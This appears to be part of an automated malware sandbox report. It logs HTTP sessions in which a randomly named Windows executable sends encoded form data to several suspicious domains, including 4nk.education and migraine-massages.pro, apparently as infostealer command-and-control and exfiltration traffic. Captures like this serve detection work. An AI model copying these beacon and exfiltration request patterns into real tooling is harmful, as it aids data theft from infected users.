                                                                                        • www.vehiculargustav.click
                                                                                        • www.yushaliu.online
                                                                                        • www.marketprediction.app

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.8497073.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 15:59:37.990912914 CET387OUTGET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.corpseflowerwatch.org
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 15:59:38.633110046 CET406INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 14:59:38 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 59 70 32 39 34 6e 67 59 59 69 47 73 6c 77 34 39 47 31 30 4b 53 53 4c 34 2b 30 7a 4c 47 32 59 55 77 47 5a 6b 4a 44 49 74 38 6b 74 63 76 41 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.849708217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 15:59:53.764880896 CET636OUTPOST /gnvu/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        Origin: http://www.4nk.education
                                                                                        Referer: http://www.4nk.education/gnvu/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 58 6d 4b 4d 34 43 6f 32 4d 6f 4c 42 4e 72 4a 77 6a 70 30 63 44 6d 35 39 72 4e 4b 48 4b 71 4d 54 55 50 67 6f 4b 51 3d
                                                                                        Data Ascii: A60d=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTXmKM4Co2MoLBNrJwjp0cDm59rNKHKqMTUPgoKQ=
                                                                                        Nov 6, 2024 15:59:54.571353912 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 14:59:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.849709217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 15:59:56.323050022 CET656OUTPOST /gnvu/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        Origin: http://www.4nk.education
                                                                                        Referer: http://www.4nk.education/gnvu/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 4f 53 39 6f 6c 38 43 39 33 6b 4a 33 66 51 32 64 47 64 51 62 6c 70 2f 33 4b 79 72 6e 35 48 30 51 59 52 65 36 33 51
                                                                                        Data Ascii: A60d=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDOS9ol8C93kJ3fQ2dGdQblp/3Kyrn5H0QYRe63Q
                                                                                        Nov 6, 2024 15:59:57.146554947 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 14:59:57 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.849710217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 15:59:58.867937088 CET1673OUTPOST /gnvu/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        Origin: http://www.4nk.education
                                                                                        Referer: http://www.4nk.education/gnvu/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 77 63 6b 45 56 57 6a 79 4b 5a 2f 4c 39 6e 61 42 31 75 6a 2f 75 69 6d 66 76 39 63 70 6b 57 71 38 30 38 2b 71 57 38 31 58 4d 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 2f 48 38 76 79 4c 4c 41 41 4d 46 46 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 39 6d 74 [TRUNCATED]
                                                                                        Data Ascii: A60d=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qceGMrIwwckEVWjyKZ/L9naB1uj/uimfv9cpkWq808+qW81XMSv4LXKEKV9d7qhPTL6dYDGOmnpA3GFBJ1jxnVacsKtmRZ4pDT5c9mlXSFWdanO/H8vyLLAAMFFmuZjo5DVzS9Yq47Mc0hlbl1NnsX6CAKG31hK689mtcUKPAhaNpMQq979kYDODo/EGzn9WzCG6moFyqpqZ+rShHu7FiHmDao6ZRDPixUU6V7iPlXFRMDR0ay75NlJNRbz0zSfP/fnzr5WHuAMkPnerp/WT7kv03vZ+DWCZNknwkGV/jIZ6UtSjEhwkea+5+dpQkK+ps4MzOfdjTU7oOn2kGIvMWr9MfhXF1wnUcquH3QJyXJVs4u6YC1g4ggi8GgCuFxQGpwf3bGNlQlDLR5K8vKOH3eFuFQYosWJYGCjw6P1nV85heoeW4Vtko5L/CCj2bWU1RJzFNZ5a+Czq6OFn7YMg/XCdIKB8niJsjQECGyu2kvf5dCeYBb4tYV/BF34A1HA3jrEqnb6ujPTYIMzeFh1JBTUxdzKT2DdMm3fLCEVdRQK46NbTzSKk741lUU2WcOxOD9Adcc6SVT9k//tT4QaOlQ8nezeSbFikUntc/haNE8LPH04eua+2WfJ5Ae7I5caWGt7Ew1n5H4VoKsxKJeI7fVaNCI9QVvhHNoq0/7zg9pPf+iuDFWJcN3XsDh8d93sRbQ9XqKN+JA4eWbRcG8YzkzD/y3wCOgtw0gYjTQ0FYriFbv7KC/FLGOvanDWeONjCzM3FFlKRjepyprCca3Q1X6KItN73QGrgcvkgMA3zQExvGGcqW3/Wm8wvnHgSlY5RMHTSN3 [TRUNCATED]
                                                                                        Nov 6, 2024 15:59:59.691667080 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 14:59:59 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.849711217.70.184.50805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:01.404284954 CET379OUTGET /gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.4nk.education
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:02.213911057 CET1236INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 06 Nov 2024 15:00:02 GMT
                                                                                        Content-Type: text/html
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Vary: Accept-Language
                                                                                        Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 6e 6b 2e 65 64 75 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                                                                        Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:02.213989019 CET890INData Raw: 2e 65 64 75 63 61 74 69 6f 6e 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 34 6e 6b 2e 65 64 75 63 61 74 69 6f 6e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                                                                        Data Ascii: .education"><strong>View the WHOIS results of 4nk.education</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.849713199.59.243.227805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:07.594315052 CET660OUTPOST /ym43/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        Origin: http://www.migraine-massages.pro
                                                                                        Referer: http://www.migraine-massages.pro/ym43/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 59 31 4f 69 33 74 75 45 53 38 4b 73 2b 62 51 45 47 50 35 63 49 46 65 33 7a 68 37 65 51 78 35 51 41 55 69 6f 41 54 35 36 63 51 62 36 4b 75 6b 31 77 38 66 71 61 42 72 49 73 59 51 51 53 6e 68 41 79 76 53 47 55 4e 62 52 49 74 61 56 34 35 6e 70 75 66 6a 6d 6c 2b 4d 49 62 59 53 44 75 6b 6e 2b 6f 68 59 56 63 63 2f 54 54 78 34 51 39 64 6a 4a 4c 77 74 38 2b 74 54 64 33 35 61 79 53 61 48 75 61 79 52 77 37 79 54 71 37 4d 36 51 38 52 4a 52 73 2f 2b 43 67 70 51 4a 79 6b 71 5a 48 39 58 77 43 65 63 33 7a 56 72 53 72 6d 56 34 7a 6f 5a 39 31 48 6b 64 6b 73 36 58 4a 34 3d
                                                                                        Data Ascii: A60d=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+CgpQJykqZH9XwCec3zVrSrmV4zoZ91Hkdks6XJ4=
                                                                                        Nov 6, 2024 16:00:08.162688017 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:08 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1154
                                                                                        x-request-id: 312dede6-eb31-4155-abd0-8bd362997e6d
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                                        set-cookie: parking_session=312dede6-eb31-4155-abd0-8bd362997e6d; expires=Wed, 06 Nov 2024 15:15:08 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
